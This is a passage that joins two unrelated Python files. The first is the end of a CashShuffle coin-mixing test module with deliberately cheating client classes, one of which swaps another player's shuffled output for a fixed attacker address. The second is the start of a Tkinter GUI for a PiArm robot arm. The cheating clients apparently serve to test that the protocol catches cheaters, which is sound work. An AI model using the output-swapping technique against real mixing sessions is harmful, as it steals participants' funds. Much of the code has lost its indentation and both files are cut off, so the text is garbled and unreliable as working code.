self.messages.shuffle_packets()
self.send_message(destination = self.players[self.next_player()])
self.logchan.send("Player " + str(self.me) + " encrypt new address")
self.phase = 'BroadcastOutput'
else:
self.logchan.send('wrong ciphertext')
class Round_wrong_outputs(Round):
    """
    Malicious Round variant used in tests: during the shuffling phase the
    cheating player replaces a randomly chosen packet's output with the
    encryption of a fixed, attacker-chosen address while still appending
    his own legitimate ciphertext.
    """
    def process_shuffling(self):
        # Phase key used to look up incoming packets in the inbox.
        phase = self.messages.phases[self.phase]
        if self.me == self.last_player():
            # Last player: strip the final encryption layer, append own
            # plain address and broadcast the output (honest behaviour).
            sender = self.players[self.previous_player(player = self.last_player())]
            if self.inbox[phase].get(sender):
                self.messages.packets.ParseFromString(self.inbox[phase][sender])
                # Decrypt every packet in place (one onion layer).
                for packet in self.messages.packets.packet:
                    packet.packet.message.str = self.crypto.decrypt(packet.packet.message.str)
                # add the last address
                self.messages.add_str(self.addr_new)
                # shuffle the packets
                self.messages.shuffle_packets()
                # form packet ...
                self.phase = 'BroadcastOutput'
                self.send_message()
                self.logchan.send("Player " + str(self.me) + " encrypt new address")
        else:
            sender = self.players[self.previous_player()]
            if self.inbox[phase].get(sender):
                self.messages.packets.ParseFromString(self.inbox[phase][sender])
                for packet in self.messages.packets.packet:
                    packet.packet.message.str = self.crypto.decrypt(packet.packet.message.str)
                # add encrypted new addres of players
                if not self.different_ciphertexts():
                    encrypted_address = self.encrypt_new_address()
                    # CHEAT: temporarily swap addr_new for a fixed address,
                    # encrypt it, then restore addr_new.  The forged
                    # ciphertext replaces a random victim's packet.
                    original_address = self.addr_new
                    self.addr_new = '1574vWgV4DAhRBhzx7q2k1p1SeA2wCpiPF'
                    encrypted_address_2 = self.encrypt_new_address()
                    self.addr_new = original_address
                    packet_index = random.randint(0, len(self.messages.get_new_addresses())-1)
                    self.logchan.send("CHEATER IS " + str(self.me))
                    self.messages.packets.packet[packet_index].packet.message.str = encrypted_address_2
                    self.messages.add_str(encrypted_address)
                    # shuffle the packets
                    self.messages.shuffle_packets()
                    self.send_message(destination = self.players[self.next_player()])
                    self.logchan.send("Player " + str(self.me) + " encrypt new address")
                    self.phase = 'BroadcastOutput'
                else:
                    # Incoming vector already contains duplicates: abort this path.
                    self.logchan.send('wrong ciphertext')
# Rewrite the client class with badass behaviour
class bad_client_wrong_broadcast(ProtocolThread):
    """
    Client thread whose round (Round_wrong_broadcast) misbehaves in the
    broadcast phase.  Interface is identical to ProtocolThread.
    """
    def not_time_to_die(f):
        """Decorator: skip the wrapped call once the protocol is flagged done."""
        def wrapper(self):
            if self.done.is_set():
                return
            f(self)
        return wrapper

    @not_time_to_die
    def start_protocol(self):
        """Build the malicious round and drive it on a worker thread."""
        coin_source = Coin(self.network)
        crypto_suite = Crypto_cheater()
        self.messages.clear_packets()
        self.protocol = Round_wrong_broadcast(
            coin_source, crypto_suite, self.messages,
            self.outcome, self.income, self.logger,
            self.session, 'Announcement', self.amount, self.fee,
            self.sk, self.sks, self.all_inputs, self.vk,
            self.players, self.addr_new, self.change
        )
        self.execution_thread = threading.Thread(target=self.protocol.start_protocol)
        self.execution_thread.start()
        self.done.wait()
        self.execution_thread.join()
class bad_client_output_vector(ProtocolThread):
    """
    Client thread whose round (Round_wrong_output_vector) tampers with the
    output vector.  Interface is identical to ProtocolThread.
    """
    def not_time_to_die(f):
        """Decorator: skip the wrapped call once the protocol is flagged done."""
        def wrapper(self):
            if self.done.is_set():
                return
            f(self)
        return wrapper

    @not_time_to_die
    def start_protocol(self):
        """Build the malicious round and drive it on a worker thread."""
        coin = Coin(self.network)
        cheat_crypto = Crypto_cheater()
        self.messages.clear_packets()
        self.protocol = Round_wrong_output_vector(
            coin, cheat_crypto, self.messages,
            self.outcome, self.income, self.logger,
            self.session, 'Announcement', self.amount, self.fee,
            self.sk, self.sks, self.all_inputs, self.vk,
            self.players, self.addr_new, self.change
        )
        self.execution_thread = threading.Thread(target=self.protocol.start_protocol)
        self.execution_thread.start()
        self.done.wait()
        self.execution_thread.join()
class bad_client_same_ciphertext(ProtocolThread):
    """
    Client thread whose round (Round_wrong_ciphertexts) injects a
    duplicate ciphertext during shuffling.  Uses the honest Crypto
    implementation; the cheating lives entirely in the round class.
    """
    def not_time_to_die(f):
        """Decorator: skip the wrapped call once the protocol is flagged done."""
        def wrapper(self):
            if self.done.is_set():
                return
            f(self)
        return wrapper

    @not_time_to_die
    def start_protocol(self):
        """Build the malicious round and drive it on a worker thread."""
        coin_source = Coin(self.network)
        honest_crypto = Crypto()
        self.messages.clear_packets()
        self.protocol = Round_wrong_ciphertexts(
            coin_source, honest_crypto, self.messages,
            self.outcome, self.income, self.logger,
            self.session, 'Announcement', self.amount, self.fee,
            self.sk, self.sks, self.all_inputs, self.vk,
            self.players, self.addr_new, self.change
        )
        self.execution_thread = threading.Thread(target=self.protocol.start_protocol)
        self.execution_thread.start()
        self.done.wait()
        self.execution_thread.join()
class bad_client_changig_the_output(ProtocolThread):
    """
    Client thread whose round (Round_wrong_outputs) substitutes another
    player's output for a fixed address.  Uses the honest Crypto
    implementation; the cheating lives entirely in the round class.
    """
    def not_time_to_die(f):
        """Decorator: skip the wrapped call once the protocol is flagged done."""
        def wrapper(self):
            if self.done.is_set():
                return
            f(self)
        return wrapper

    @not_time_to_die
    def start_protocol(self):
        """Build the malicious round and drive it on a worker thread."""
        coin_source = Coin(self.network)
        honest_crypto = Crypto()
        self.messages.clear_packets()
        self.protocol = Round_wrong_outputs(
            coin_source, honest_crypto, self.messages,
            self.outcome, self.income, self.logger,
            self.session, 'Announcement', self.amount, self.fee,
            self.sk, self.sks, self.all_inputs, self.vk,
            self.players, self.addr_new, self.change
        )
        self.execution_thread = threading.Thread(target=self.protocol.start_protocol)
        self.execution_thread.start()
        self.done.wait()
        self.execution_thread.join()
class TestProtocolCase(unittest.TestCase):
    """
    Base test case for the CashShuffle protocol.

    Reads server/client settings from plugins/shuffle/tests/config.ini,
    starts a real shuffling server process around every test, and provides
    helpers for building honest and malicious client threads against a
    fake network.
    """

    def __init__(self, *args, **kwargs):
        super(TestProtocolCase, self).__init__(*args, **kwargs)
        config = configparser.ConfigParser()
        # Read the config via a context manager so the file handle is
        # closed (the old code leaked the handle returned by open()).
        with open('plugins/shuffle/tests/config.ini') as config_file:
            config.read_file(config_file)
        self.HOST = config["CashShuffle"]["address"]
        self.PORT = int(config["CashShuffle"]["port"])
        self.fee = int(config["Clients"]["fee"])
        self.amount = int(config["Clients"]["amount"])
        self.number_of_players = int(config["CashShuffle"]["pool_size"])
        # Only the literal string "True" enables the -d debug flag
        # (same semantics as the previous lookup-table check).
        self.server_debug = " -d " if config["CashShuffle"]["enable_debug"] == "True" else " "
        self.args = self.server_debug + " -s "+ str(self.number_of_players) + " -p " + str(self.PORT)
        self.casshuffle_path = config["CashShuffle"]["path"]

    def setUp(self):
        """Start a fresh fake network and a real server process."""
        self.network = testNetwork()
        self.logger = ChannelWithPrint()
        print("exec " + self.casshuffle_path + self.args)
        # setsid detaches the server into its own process group so kill()
        # in tearDown reaches it cleanly.
        self.server = subprocess.Popen("exec " + self.casshuffle_path + self.args, shell = True, preexec_fn=os.setsid)

    def tearDown(self):
        """Kill the server process started in setUp."""
        self.server.kill()

    def get_random_address(self):
        """Return a fresh P2PKH address derived from a random secret key."""
        return public_key_to_p2pkh(bytes.fromhex(random_sk().get_public_key()))

    def make_bad_client(self, bad_cleint_thread, with_print = False):
        """
        Build one malicious client thread of class *bad_cleint_thread*
        with random keys and enough fake coins to cover amount + fee.
        (Misspelled parameter name kept for backward compatibility.)
        """
        sk = random_sk()
        channel = ChannelWithPrint() if with_print else Channel()
        public_key = sk.get_public_key()
        inputs = {}
        number_of_pubs = random.randint(1, 3)
        secret_keys = [random_sk() for _ in range(number_of_pubs)]
        sks = {sk.get_public_key():sk for sk in secret_keys}
        for pubk in sks:
            inputs[pubk] = []
            number_of_coins = random.randint(1, 2)
            addr = public_key_to_p2pkh(bytes.fromhex(pubk))
            for i in range(number_of_coins):
                # Each coin covers its per-key/per-coin share of the amount
                # plus the fee, with up to 1000 units of headroom.
                min_amout_per_input = self.amount // number_of_pubs // number_of_coins
                coin_amount = random.randint(min_amout_per_input + self.fee + 1 , min_amout_per_input + self.fee + 1000)
                coin_hash = fake_hash(addr, coin_amount)
                inputs[pubk].append(coin_hash+":0")
                self.network.add_coin(addr, coin_amount, tx_hash=coin_hash)
        return bad_cleint_thread(self.HOST, self.PORT, self.network,
                                 self.amount, self.fee, sk, sks, inputs , public_key,
                                 self.get_random_address(), self.get_random_address(), logger = channel)

    def make_clients_threads(self, number_of_clients = None, with_print = False):
        """Build *number_of_clients* honest client threads (defaults to pool size)."""
        if not number_of_clients:
            number_of_clients = self.number_of_players
        players = [{"channel":ChannelWithPrint() if with_print else Channel()}
                   for _ in range(number_of_clients)]
        for player in players:
            number_of_pubs = random.randint(1, 3)
            player["secret_keys"] = [random_sk() for _ in range(number_of_pubs)]
            player["sks"] = {sk.get_public_key():sk for sk in player["secret_keys"]}
            player["inputs"] = {}
            for pubk in player["sks"]:
                player["inputs"][pubk] = []
                number_of_coins = random.randint(1, 2)
                addr = public_key_to_p2pkh(bytes.fromhex(pubk))
                for i in range(number_of_coins):
                    min_amout_per_input = self.amount // number_of_pubs // number_of_coins
                    coin_amount = random.randint(min_amout_per_input + self.fee + 1 , min_amout_per_input + self.fee + 1000)
                    coin_hash = fake_hash(addr, coin_amount)
                    player["inputs"][pubk].append(coin_hash+":0")
                    self.network.add_coin(Address.from_pubkey(pubk), coin_amount, tx_hash=coin_hash)
            player["sk"] = random_sk()
            player["pubk"] = player["sk"].get_public_key()
        protocolThreads = [testThread(self.HOST, self.PORT, self.network, "x" ,self.amount, self.fee,
                                      player["sk"], player["sks"], player["inputs"], player["pubk"],
                                      self.get_random_address(), self.get_random_address(), logger = player['channel'])
                           for player in players]
        return protocolThreads

    def start_protocols(self, protocolThreads, delay = 0):
        """Start every client thread, sleeping *delay* seconds before each start."""
        for pThread in protocolThreads:
            time.sleep(delay)
            pThread.start()

    def stop_protocols(self, protocolThreads):
        """Join every client thread."""
        for pThread in protocolThreads:
            pThread.join()

    def is_protocol_complete(self, pThread):
        """Return the round's done flag, or False if no round has started yet."""
        if pThread.protocol:
            return pThread.protocol.done
        else:
            return False

    def is_round_live(self, pThread):
        """True/False while a round worker thread exists, None before it starts."""
        # Parameter renamed from the misspelled 'sefl' to the conventional 'self'.
        return pThread.execution_thread.is_alive() if pThread.execution_thread else None

    def get_last_logger_message(self, pThread, debug = False):
        """Drain the client's logger channel and return the last message seen."""
        message = None
        while not pThread.logger.empty():
            message = pThread.logger.get()
            if debug:
                print(message)
        return message
|
controlGUI.py
|
#! /usr/bin/python3
'''
This file contains GUI code for Controlling PiArm
'''
import piarm
import logging
import os
import threading
import shutil
import subprocess
import time
import re
import picamera
from tkinter import font
import tkinter as tk
from tkinter import messagebox
from tkinter import simpledialog
from tkinter import filedialog
########################## MainApp ###########################################
class MainApp(piarm.PiArm, tk.Tk):
'''
This is a class for Creating Frames and Buttons for left and top frame
'''
    def __init__(self, *args, **kwargs):
        '''
        Build the main window: size and centre it, create the left control
        frame and right body frame, load all image resources and wire the
        window-close handler.
        '''
        # Images must be module-level or Tk garbage-collects them.
        global logo, img
        tk.Tk.__init__(self, *args, **kwargs)
        self.screen_width=tk.Tk.winfo_screenwidth(self)
        self.screen_height=tk.Tk.winfo_screenheight(self)
        self.app_width=800
        self.app_height= 480
        # Centre the 800x480 window on the screen.
        self.xpos = (self.screen_width/2)-(self.app_width/2)
        self.ypos = (self.screen_height/2)-(self.app_height/2)
        self.port = None                # last serial port name, if any
        self.groupSelected = None       # name of the active command group
        self.loopVar = tk.IntVar()      # "Loop" checkbox state
        self.checkIDVar = []            # per-servo torque checkbox vars
        self.posEntry = []              # per-servo position entry widgets
        self.timeEntry = []             # per-servo speed entry widgets
        self.modify_data = []           # entry grid of the Modify dialog
        self.servo_POS_error = False    # set when a position read is out of range
        self.geometry("%dx%d+%d+%d" %(self.app_width,self.app_height,self.xpos,
                                      self.ypos))
        self.title("PiArm Controller")
        # Small displays (e.g. a Pi touchscreen) get fullscreen mode.
        if not self.screen_width > self.app_width:
            self.attributes('-fullscreen', True)
        self.config(bg="gray85")
        self.container = tk.Frame(self,height=480, width=800)
        self.container.pack(fill = 'both', expand = True)
        self.camFrame = tk.Frame(self,height=480, width=800, bg='black')
        self.left_frame=tk.Frame(self.container,width=int(self.app_width/4),
                                 bg="gray85")
        self.left_frame.pack(side="left", fill="both")
        self.left_frame.pack_propagate(0)
        # Thin vertical divider between the control and body panes.
        self.mid_frame=tk.Frame(self.container,width=5,bg="gray50")
        self.mid_frame.pack(side="left", fill="both")
        self.right_frame=tk.Frame(self.container,bg="gray85")
        self.right_frame.pack(side="left",fill="both",expand=True)
        logo = tk.PhotoImage(file = Root_Dir + '/Images/DALogoSmall.png')
        img = tk.PhotoImage(file = Root_Dir + '/Images/piarm.png')
        self.camIcon = tk.PhotoImage(file = Root_Dir + '/Images/camera.png')
        self.vidIcon = tk.PhotoImage(file = Root_Dir + '/Images/video.png')
        self.clickIcon = tk.PhotoImage(file = Root_Dir + '/Images/click.png')
        self.homeIcon = tk.PhotoImage(file = Root_Dir + '/Images/home.png')
        self.backIcon = tk.PhotoImage(file = Root_Dir + '/Images/back.png')
        # Route the window-manager close button through our cleanup path.
        self.protocol("WM_DELETE_WINDOW", self.close_Robot)
        self.leftFrame_Contents()
        self.rightFrame_Contents()
def close_Robot(self):
'''
This function delete the temp folder and close PiArm
'''
try:
shutil.rmtree(Root_Dir + '/.Temp')
except FileNotFoundError:
pass
self.log.info('PiArm Closed Successfully..!!')
self.destroy()
    def leftFrame_Contents(self):
        '''
        Build the four stacked control canvases on the left pane:
        SERIAL (port open/close + link indicator), RECORD (read/write/
        default/torque), GROUP (add/delete/import/export) and COMMAND
        (command editing + playback).
        '''
        serial_box=tk.Canvas(self.left_frame,width=160,
                             height=110)
        serial_box.grid(row=0, column=0)
        serial_box.grid_propagate(False)
        ''' Serial Canvas '''
        # 4 evenly weighted rows, first 2 columns weighted.
        for i in range (4):
            serial_box.grid_rowconfigure(i,weight=1)
            if i < 2:
                serial_box.grid_columnconfigure(i,weight=1)
        serial_heading=tk.Label(serial_box,bg="gray50",fg="white",
                                text="SERIAL")
        serial_heading.grid(row=0, column=0,columnspan=2, sticky="new")
        com_label = tk.Label(serial_box, fg="Black",text="Port")
        com_label.grid(row=1, column=0)
        self.com_entry = tk.Entry(serial_box,width=10)
        self.com_entry.grid(row=1, column=1)
        # Pre-fill the last used port name, if known.
        if self.port:
            self.com_entry.insert(0, self.port)
        baud_label = tk.Label(serial_box, fg="Black",text="Baudrate")
        baud_label.grid(row=2, column=0)
        # Baudrate is fixed at 115200; the entry is display-only.
        baud_entry = tk.Entry(serial_box,width=10)
        baud_entry.insert("end", "115200")
        baud_entry.grid(row=2, column=1)
        baud_entry.config(state="readonly")
        # Red/green "LED" reflecting the serial link state.
        self.circle=tk.Canvas(serial_box,height=40, width=40,bg="gray85",bd=0)
        self.indication = self.circle.create_oval(10,10,30,30, fill="red")
        self.circle.grid(row=3, column=0)
        self.connect_button = tk.Button(serial_box,text="Open",bg="gray80", bd=2,
                                        borderwidth=2,command = self.connectPort)
        self.connect_button.grid(row=3, column=1)
        ''' Record Canvas '''
        record_box=tk.Canvas(self.left_frame,width=160, height=120)
        record_box.grid(row=1, column=0)
        record_box.grid_propagate(False)
        for i in range (4):
            record_box.grid_rowconfigure(i,weight=1)
            if i < 2:
                record_box.grid_columnconfigure(i,weight=1)
        record_heading=tk.Label(record_box,bg="gray50",fg="white",
                                text="RECORD")
        record_heading.grid(row=0, column=0, columnspan=2, sticky="new")
        readButton = tk.Button(record_box,text="Read",bg='gray80',borderwidth=2,
                               command=self.read_ServoPos, bd=2)
        readButton.grid(row=0, column=0, pady=(22,0))
        writeButton = tk.Button(record_box,text="Write",bg='gray80',borderwidth=2,
                                command = self.write_ServoPos, bd=2)
        writeButton.grid(row=0, column=1, pady=(22,0))
        defaultButton = tk.Button(record_box,text=" Default_Position ",bg='gray80',
                                  borderwidth=2, command=self.default_Pos, bd=2)
        defaultButton.grid(row=1, column=0,columnspan=2)
        # Toggles torque for all six servos; label flips between
        # All_Torque_Enable / All_Torque_Disable.
        self.torqueButton = tk.Button(record_box,text="All_Torque_Enable",
                                      bg='gray80',command=self.allTorque_Enable,
                                      bd=2, borderwidth=2)
        self.torqueButton.grid(row=2, column=0, columnspan=2)
        ''' Group Canvas '''
        group_box=tk.Canvas(self.left_frame,width=160, height=90)
        group_box.grid(row=2, column=0)
        group_box.grid_propagate(False)
        for i in range (4):
            group_box.grid_rowconfigure(i,weight=1)
            if i < 2:
                group_box.grid_columnconfigure(i,weight=1)
        group_Label=tk.Label(group_box,bg="gray50",fg="white",
                             text="GROUP")
        group_Label.grid(row=0, column=0, columnspan=2, sticky="new")
        addGroup_Button = tk.Button(group_box,text=" Add ",bg='gray80', bd=2,
                                    command = self.add_Group, borderwidth=2)
        addGroup_Button.grid(row=0, column=0, pady=(22,0))
        delGroup_Button = tk.Button(group_box,text="Delete",bg='gray80',bd=2,
                                    command=self.deleteGroup, borderwidth=2)
        delGroup_Button.grid(row=0, column=1, pady=(22,0))
        importButton = tk.Button(group_box,text="Import",bg='gray80', bd=2,
                                 command=self.importGroup, borderwidth=2)
        importButton.grid(row=1, column=0)
        exportButton = tk.Button(group_box,text="Export",bg='gray80',bd=2,
                                 command=self.exportGroup, borderwidth=2)
        exportButton.grid(row=1, column=1)
        ''' Command Canvas '''
        cmd_box=tk.Canvas(self.left_frame,width=160, height=140)
        cmd_box.grid(row=3, column=0)
        cmd_box.grid_propagate(False)
        for i in range (4):
            cmd_box.grid_rowconfigure(i,weight=1)
            if i < 2:
                cmd_box.grid_columnconfigure(i,weight=1)
        record_heading=tk.Label(cmd_box,bg="gray50",fg="white",
                                text="COMMAND")
        record_heading.grid(row=0, column=0, columnspan=2, sticky="new")
        timeLabel=tk.Label(cmd_box, text="Time (ms)")
        timeLabel.grid(row=0, column=0, pady=(22,0))
        # Keystroke validation for the per-command delay entry.
        delay_vcmd = (self.register(self.delay_validate),'%P')
        self.delayEntry = tk.Entry(cmd_box,validate='key',width=5, bd='1',
                                   validatecommand=delay_vcmd)
        self.delayEntry.grid(row=0, column=1, pady=(22,0))
        self.delayEntry.insert('end', 1000)
        addCmd_Button = tk.Button(cmd_box,text=" Add ",bg='gray80',borderwidth=2,
                                  command=self.add_Command, bd=2)
        addCmd_Button.grid(row=1, column=0)
        delCmd_Button = tk.Button(cmd_box,text="Delete",bg='gray80',borderwidth=2,
                                  command=self.del_Command, bd=2)
        delCmd_Button.grid(row=1, column=1)
        insertButton = tk.Button(cmd_box,text="Insert",bg='gray80', borderwidth=2,
                                 command=self.insert_Command, bd=2 )
        insertButton.grid(row=2, column=0)
        modifyButton = tk.Button(cmd_box,text="Modify",bg='gray80', borderwidth=2,
                                 command=self.modify_Command, bd=2)
        modifyButton.grid(row=2, column=1)
        loopButton = tk.Checkbutton(cmd_box, text='Loop',variable = self.loopVar,
                                    onvalue=1, offvalue=0)
        loopButton.grid(row=3, column=0)
        # Label flips between Play and Stop during playback.
        self.playButton = tk.Button(cmd_box,text="Play",font=('Helvetica', 12),
                                    command=self.cmdPlay,bg='SteelBlue2', bd=2,
                                    borderwidth=2)
        self.playButton.grid(row=3, column=1)
def connectPort(self):
'''
This function connects the serial port
'''
if self.connect_button.cget('text') == 'Open' and self.com_entry.get():
robot.connect("/dev/"+self.com_entry.get())
if robot.alive:
self.connect_button.config(relief="sunken", text="Close")
self.circle.itemconfigure(self.indication, fill="green3")
self.com_entry.config(state="readonly")
elif self.connect_button.cget('text') == 'Close':
self.connect_button.config(relief="raised", text="Open")
self.circle.itemconfigure(self.indication, fill="red")
robot.disconnect()
self.com_entry.config(state="normal")
else:
messagebox.showerror("Port Error", "Enter Comm Port..!!")
self.com_entry.config(state="normal")
    def read_ServoPos(self):
        '''
        Read the current position of all six servos into the position
        entry boxes.  Shows an error dialog if a servo reports a value
        above MAX_VALUE or does not respond at all.
        '''
        if robot.alive:
            try:
                for ID in range(1, 7):
                    response = robot.positionRead(ID)
                    # Position is little-endian in reply bytes 5..6.
                    pos = int.from_bytes(response[5]+response[6], byteorder='little')
                    if pos > MAX_VALUE:
                        # Flag and stop at the first out-of-range servo.
                        self.servo_POS_error = True
                        break
                    else:
                        self.posEntry[ID-1].delete(0,'end')
                        self.posEntry[ID-1].insert(0, pos)
                if self.servo_POS_error:
                    # ID still names the servo that broke the loop.
                    messagebox.showerror("Servo Error", "Servo " + str(ID) +
                                         ' - Position Out of Range..!')
                    self.servo_POS_error = False
                else:
                    messagebox.showinfo("Data Read","Read Done Successfully")
            except TypeError:
                # Presumably positionRead returns a non-indexable value
                # (e.g. None) when the servo does not answer — TODO confirm.
                messagebox.showerror("Servo Error", "Servo " + str(ID) +
                                     ' - Not Responding')
        else:
            messagebox.showerror("Comm Error", 'Comm Port is not Connected !!')
def write_ServoPos(self):
'''
This funciton write servo position
'''
try:
if robot.alive:
for ID in range(1, 7):
robot.servoWrite(ID,int(self.posEntry[ID-1].get()),
int(self.timeEntry[ID-1].get()))
self.checkIDVar[ID-1].set(1)
self.torqueButton.config(relief="sunken", text="All_Torque_Disable")
messagebox.showinfo("Data Write","Write Done Successfully")
else:
messagebox.showerror("Comm Error", 'Comm Port is not Connected !!')
except ValueError:
messagebox.showerror("Value Error", 'Entry value cannot be empty..!! !!')
def default_Pos(self):
'''
This funciton set each servo to default position
'''
if robot.alive:
DEFAULT = [500, 500, 500, 500, 500, 500]
for ID in range(1, 7):
robot.servoWrite(ID, int(DEFAULT[ID -1]), 500)
self.posEntry[ID-1].delete(0,'end')
self.posEntry[ID-1].insert(0, DEFAULT[ID-1])
self.checkIDVar[ID-1].set(1)
self.torqueButton.config(relief="sunken", text="All_Torque_Disable")
messagebox.showinfo("Default","Write Done Successfully")
else:
messagebox.showerror("Comm Error", 'Comm Port is not Connected !!')
def allTorque_Enable(self):
'''
This function enable all servo torque
'''
if robot.alive:
if self.torqueButton.cget('text') == 'All_Torque_Enable':
self.torqueButton.config(relief="sunken", text="All_Torque_Disable")
for ID in range(1, 7):
robot.torqueServo(ID, 1)
self.checkIDVar[ID-1].set(1)
elif self.torqueButton.cget('text') == 'All_Torque_Disable':
self.torqueButton.config(relief="raised", text="All_Torque_Enable")
for ID in range(1, 7):
robot.torqueServo(ID, 0)
self.checkIDVar[ID-1].set(0)
else:
messagebox.showerror("Comm Error", 'Comm Port is not Connected !!')
def tick_EnTorque(self, index):
'''
This funciton enable selected servo torque
'''
if robot.alive:
robot.torqueServo(index + 1, self.checkIDVar[index].get())
else:
messagebox.showerror("Comm Error", 'Comm Port is not Connected !!')
def add_Group(self):
'''
This funciton add a group name
'''
groupName = simpledialog.askstring('Group Name', 'Enter a name')
if groupName:
for entry in self.groupBox.get('0', 'end'):
if entry == groupName:
tk.messagebox.showerror('Name Error','Group Name Already Exits..!!')
return 0
self.groupBox.insert('end', groupName)
if len(self.groupBox.get('0', 'end')) == 1:
self.groupBox.select_set(0)
self.groupBox.activate(0)
self.groupSelected = groupName
with open(Root_Dir+"/.Temp/"+groupName + ".txt", "w") as file:
self.log.info(groupName + ' temperary file created')
def deleteGroup(self):
'''
This funciton deleter selected group name
'''
if self.groupBox.size():
index = self.groupBox.index('active')
self.groupBox.delete(index)
os.remove(Root_Dir +'/.Temp/'+self.groupSelected+'.txt')
self.commandBox.delete(0, 'end')
size = self.groupBox.size()
if size:
self.groupSelected = self.groupBox.get('0')
self.groupBox.select_set(0)
self.groupBox.activate(0)
file = open(Root_Dir+'/.Temp/'+ self.groupSelected +'.txt', 'r')
for line in file:
stripLine = line.strip()
self.commandBox.insert(0,stripLine)
if size == 0:
self.groupSelected = None
else:
tk.messagebox.showerror('Group Error','Group Name Not Selected..!!')
def add_Command(self):
'''
This funciton add servo read values (i.e. command) to selected group
'''
if self.groupSelected:
cmdList = []
for ID in range(0, 6):
cmd = ("ID:" + str(ID+1) +' P' + (self.posEntry[ID].get()) + ",T" + (self.timeEntry[ID].get())+' ')
cmdList.append(cmd)
if str(self.delayEntry.get()) == '':
cmdList.append('Time:' + '1000')
else:
cmdList.append('Time:' + str(self.delayEntry.get()))
self.commandBox.insert('end',''.join(cmdList))
with open(Root_Dir+'/.Temp/' + self.groupSelected +'.txt', 'a') as file:
file.write(''.join(cmdList)+'\n')
else:
tk.messagebox.showerror('Group Error','Group Name Not Selected..!!')
def del_Command(self):
'''
This funciton delete selected command
'''
item = self.commandBox.curselection()
if item and self.groupSelected:
self.commandBox.delete(item)
cmd_List = self.commandBox.get(0, 'end')
with open(Root_Dir +"/.Temp/"+self.groupSelected+'.txt', 'w') as file:
for value in cmd_List:
file.write(value + '\n')
else:
tk.messagebox.showerror('Command Error','Command Not Selected..!!')
def insert_Command(self):
'''
This funciton insert command above the selected command
'''
item = self.commandBox.curselection()
if item and self.groupSelected:
cmdList = []
for ID in range(0, 6):
cmd = ("ID:" + str(ID+1) +' P' + (self.posEntry[ID].get()) + ",T" + (self.timeEntry[ID].get())+' ')
cmdList.append(cmd)
if str(self.delayEntry.get()) == '':
cmdList.append('Time:' + '1000')
else:
cmdList.append('Time:' + str(self.delayEntry.get()))
position = self.commandBox.curselection()
self.commandBox.insert(position,''.join(cmdList))
cmd_List = self.commandBox.get(0, 'end')
with open(Root_Dir+"/.Temp/"+self.groupSelected+'.txt', 'w') as file:
for value in cmd_List:
file.write(value + '\n')
else:
tk.messagebox.showerror('Command Error','Command Not Selected..!!')
def modify_Command(self):
'''
This funciton modify the selected command
'''
item = self.commandBox.curselection()
if item and self.groupSelected:
self.top_Level = tk.Toplevel()
windowWidth = self.top_Level.winfo_reqwidth()
windowHeight = self.top_Level.winfo_reqheight()
# Gets both half the screen width/height and window width/height
positionRight = int(self.top_Level.winfo_screenwidth()/2 - windowWidth/2)
positionDown = int(self.top_Level.winfo_screenheight()/2- windowHeight/2)
# Positions the window in the center of the page.
self.top_Level.geometry("+{}+{}".format(positionRight, positionDown))
self.top_Level.title('Modify')
self.top_Level.resizable(False, False)
self.modify_data = []
index = self.commandBox.curselection()
tk.Label(self.top_Level, text="ID").grid(row=0, column=0)
tk.Label(self.top_Level, text="Position").grid(row=0, column=1)
tk.Label(self.top_Level, text="Speed").grid(row=0, column=2)
rawData = self.commandBox.get(index)
rawData = rawData.split(' ')
for index in range(0,6):
cmd_Data = re.findall('\d+', rawData[index])
self.modify_data.append([0,0,0])
self.modify_data[index][0]= tk.Entry(self.top_Level, width=6)
self.modify_data[index][0].insert(0,index+1)
self.modify_data[index][0].grid(row=index+1,column=0)
self.modify_data[index][0].config(state='readonly')
self.modify_data[index][1]= tk.Entry(self.top_Level, width=12)
self.modify_data[index][1].insert(0,cmd_Data[1])
self.modify_data[index][1].grid(row=index+1,column=1)
self.modify_data[index][2]= tk.Entry(self.top_Level, width=12)
self.modify_data[index][2].insert(0,cmd_Data[2])
self.modify_data[index][2].grid(row=index+1,column=2)
tk.Button(self.top_Level, text='Save', command=self.modify_Save).grid(row = 7, column = 1, pady = 10, stick = 'W')
tk.Button(self.top_Level, text='Cancel', command=self.top_Level.destroy).grid(row = 7, column = 2, pady = 10, stick = 'W')
else:
tk.messagebox.showerror('Command Error','Command Not Selected..!!')
def modify_Save(self):
'''
This funciton save the modified command to command box
'''
cmdList = []
for index in range(0,6):
if (self.modify_data[index][1].get()) and (self.modify_data[index][2].get()):
cmd = "ID:" + str(index+1) +' P' + self.modify_data[index][1].get() + ",T" + self.modify_data[index][2].get() +' '
cmdList.append(cmd)
else:
tk.messagebox.showerror('Error','Fields cannot be empty')
break
if cmdList:
if str(self.delayEntry.get()) == '0':
cmdList.append('Time:' + '1000')
else:
cmdList.append('Time:' + str(self.delayEntry.get()))
value = self.commandBox.curselection()[0]
self.commandBox.delete(value)
self.commandBox.insert(value,''.join(cmdList))
self.commandBox.select_set(value)
self.commandBox.activate(value)
self.top_Level.destroy()
def cmdPlay(self):
'''
This funciton creates a thread to play the commands of the
selected group
'''
#if robot.alive:
if self.playButton.cget('text') == 'Play' and self.commandBox.size():
self.playButton.config(relief="sunken", text="Stop")
self.playFlag = True
self.threadContRead = threading.Thread(target=self._continousPlay)
self.threadContRead.daemon = True
self.threadContRead.start()
elif self.playButton.cget('text') == 'Stop':
self.playButton.config(relief="raised", text="Play")
self.playFlag = False
else:
messagebox.showerror("Data Error", "No command to play..!!")
def _continousPlay(self):
'''
This thread play the coomands of the selected group
'''
self.torqueButton.config(relief="sunken", text="All_Torque_Disable")
size = self.commandBox.size()
while self.playFlag:
for index in range(0, size):
self.commandBox.select_set(index)
rawData = self.commandBox.get(index)
rawData = rawData.split(' ')
delay = rawData[-1].split(':')
delay = int(delay[1])/1000
if robot.alive:
for value in range(0, 6):
cmd_Data = re.findall('\d+', rawData[value])
robot.servoWrite(int(cmd_Data[0]), int(cmd_Data[1]), int(cmd_Data[2]))
self.checkIDVar[value].set(1)
else:
messagebox.showerror("Comm Error", 'Comm Port is not Connected !!')
time.sleep(delay)
self.commandBox.select_clear(index)
if not self.playFlag:
break
if not self.loopVar.get():
self.playButton.config(relief="raised", text="Play")
self.playFlag = False
def importGroup(self):
'''
This funciton import the group and its commands
'''
file_path = filedialog.askopenfilename(initialdir = Root_Dir)
line_index = 0
if file_path:
file_name = file_path.split('/')
group_Name = file_name[-1].split('.')
for name in self.groupBox.get(0, 'end'):
if group_Name[0] == name:
tk.messagebox.showerror('Group Error','Group Name already exists..!!')
return False
file = open(file_path, 'r')
